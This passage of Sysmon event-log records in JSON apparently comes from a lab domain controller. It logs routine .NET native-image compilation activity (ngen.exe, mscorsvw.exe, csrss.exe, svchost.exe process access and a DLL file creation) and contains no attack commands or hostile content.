06:00:37.684","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0505-5F25-0000-00101FF81200}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:00:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8064,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:37.684\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0505-5F25-0000-00101FF81200}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:37.684","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0505-5F25-0000-00101FF81200}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8065,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:37.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0505-5F25-0000-00101FF81200}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:37.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0505-5F25-0000-00101FF81200}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8066,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:41.231\r\nProcessGuid: {A837DB8D-0505-5F25-0000-00101FF81200}\r\nProcessId: 1064\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\428-0\\System.Xml.dll\r\nCreationUtcTime: 2020-08-01 06:00:41.231","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:41.231","ProcessGuid":"{A837DB8D-0505-5F25-0000-00101FF81200}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\428-0\\System.Xml.dll","CreationUtcTime":"2020-08-01 06:00:41.231","EventReceivedTime":"2020-08-01 06:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8067,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:41.372\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-0010FA6A1200}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:41.372","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-0010FA6A1200}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8068,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:41.372\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-0010FA6A1200}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:41.372","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-0010FA6A1200}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8069,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:41.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-0010FA6A1200}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:41.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-0010FA6A1200}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8070,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:41.512\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-0010176E1200}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:41.512","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-0010176E1200}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8071,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:41.512\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-0010176E1200}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:41.512","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-0010176E1200}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8072,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:41.528\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0509-5F25-0000-001026001300}\r\nTargetProcessId: 4240\r\nTargetImage: 